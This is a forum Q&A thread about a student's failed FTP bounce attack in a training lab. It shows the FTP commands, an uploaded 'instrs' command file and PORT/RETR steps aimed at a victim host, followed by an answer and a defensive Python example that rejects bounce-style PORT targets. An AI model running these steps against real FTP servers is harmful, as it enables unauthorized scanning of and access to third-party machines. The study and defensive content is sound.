
I'm studying security in a training lab, and I'm trying to implement the infamous FTP-bounce attack. I'll use a remote FTP server (called BOUNCE here) in order to access a folder on the VICTIM machine which is forbidden for my IP address. I don't know if the VICTIM machine allows access to the forbidden folder to BOUNCE, but it's still worth trying :).

Here is what I do:

I start my own pure-ftp server and connect to it:

service pure-ftpd start

~# ftp My_IP 21
ftp> USER my_own_username

Then, I tell my server to go into passive mode. It answers with an IP address (which is my own IP address) and a PORT with a shape like (F,F,F,F,X,X). I take note of it for later.

ftp> quote "pasv"   
Entering Passive Mode (F,F,F,F,X,X)

And finally, I tell my server to accept data from the data channel and store it into the foobar file; if it does not exist, the server creates one.

ftp> quote "stor foobar"   

After this, my server (which is in passive mode now) will hang...

Now I'm going to use an FTP-bounce vulnerable server (which I found thanks to nmap displaying the message "Ftp-Bounce Working !") which I'll call "Bounce". If I understood correctly, this latter is able to connect to other FTP servers using the PORT command. Luckily I can connect to Bounce anonymously and upload some files on it using the PUT command.

Next, I'll import the following file onto Bounce:

user anonymous
pass whatyouwant
cd /restricted-folder
port F,F,F,F,X,X
ls
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...

It will then be uploaded from Bounce to the Victim Machine in order to let this latter execute the instructions in it.

I do this with those last commands (still on Bounce):

put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"

Where C,C,C,C,0,21 is the IP of the victim machine (let's call it VICTIM). (So it will connect to VICTIM and tell it to execute the instructions in the instrs file, if I understood correctly.)

Problem: just after the command quote "retr instrs" I get the following error: 501 Cannot RETR. Error

So, I'm wondering, is it VICTIM or BOUNCE that prevents the RETR command from working? Tell me also if you think I misunderstood something. Thanks a lot for your attention.

ahg8tOPk78

1 Answer


You have not understood FTP Bounce attacks.

FTP Bounce attacks do not let an FTP server connect to another one, but let you request access to ports by using the command PORT. It's mostly used to make a port scan without being detected (as you are not the one doing it, but the FTP server for you), or even for D.o.S. attacks.

Turning this FTP-bounce to upload a file from an FTP server to another (as it seems you want to do, sorry if I misunderstood you) requires much more than this.

So the PORT command may work, but not RETR.

KanekiDev
  • Just to be clear, when nmap says "FTP Bounce working" it means that the machine is able to send the PORT command, right? – ahg8tOPk78 Oct 17 '16 at 14:44
  • What I want to achieve is only to see the content of a forbidden folder (see the "ls" command in the file I'm sending to the BOUNCE server). – ahg8tOPk78 Oct 17 '16 at 14:45
  • When nmap gives you that advice, it means the server is vulnerable to those attacks. So yes, you're able to tell the FTP server to send the PORT command to any other machine. – KanekiDev Oct 17 '16 at 14:46
  • Listing a folder requires more than the PORT command. Using PORT you tell the server that "you are waiting for a connection on a specified address (ip+port)"; sending commands like ls requires (for example) a shell. It cannot be achieved just by ftp-bouncing. – KanekiDev Oct 17 '16 at 14:47
  • Ok, so if I get the error message, it means that the "bouncable" server does not provide the RETR function, is that right? – ahg8tOPk78 Oct 17 '16 at 14:52
  • Yes, it means so just by the error message. – KanekiDev Oct 17 '16 at 14:56
  • Ok, I don't see why I would need a shell as "ls" is also an ftp command (and the most accepted command on every FTP server I guess)... – ahg8tOPk78 Oct 17 '16 at 15:02
  • Yep, that's right... but if you can't list a private folder using ls, you are trying to list it by using ftp-bounce (as far as I understood, sorry if I misunderstood that part of your question), so you need to gain privileges or a full shell. But that would require not an ftp-bounce attack but a Site-to-Site Transfer Attack. – KanekiDev Oct 17 '16 at 15:05
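The question relies on the h1,h2,h3,h4,p1,p2 addressing that PASV replies and PORT arguments share, and the answer's point is that a bounce-capable server will honour a PORT aimed at any host. The server-side check that closes that gap is to accept a PORT target only when it is the control connection's own peer (and not a privileged port). The following is an added example, not code from the thread or from pure-ftpd; all names, the 10.0.0.x addresses and the transcript lines are constructed.

```python
import re
from ipaddress import ip_address

_PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

def decode_hostport(fields):
    """Turn the six h1,h2,h3,h4,p1,p2 fields of PORT/PASV into (ip, port).
    Raises ValueError on a wrong field count, non-numeric or out-of-range field."""
    h1, h2, h3, h4, p1, p2 = (int(f) for f in fields)
    if not all(0 <= v <= 255 for v in (h1, h2, h3, h4, p1, p2)):
        raise ValueError("field out of range")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

def parse_pasv_reply(line):
    """Parse a '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' reply
    into the (ip, port) the client is expected to connect to."""
    m = _PASV_RE.search(line)
    if not m:
        raise ValueError("no PASV tuple in reply")
    return decode_hostport(m.groups())

def check_port_command(client_ip, args):
    """Decide whether a PORT command received from client_ip should be honoured.
    Returns (allowed, reason). A target that is not the client itself is the
    bounce shape the thread describes; a privileged port is rejected as well."""
    try:
        host, port = decode_hostport(args.split(","))
    except ValueError as e:
        return False, f"malformed PORT argument: {e}"
    if ip_address(host) != ip_address(client_ip):
        return False, f"PORT target {host} differs from control peer {client_ip}"
    if port < 1024:
        return False, f"PORT target port {port} is privileged"
    return True, "ok"

if __name__ == "__main__":
    # Constructed control-channel transcript: (peer address, command argument).
    peer = "10.0.0.5"
    for args in ("10,0,0,5,19,136",   # client's own listener, port 5000: fine
                 "10,0,0,9,0,21",     # third host, port 21: the bounce case
                 "10,0,0,5,0,21"):    # own host but privileged port
        print(args, "->", check_port_command(peer, args))
```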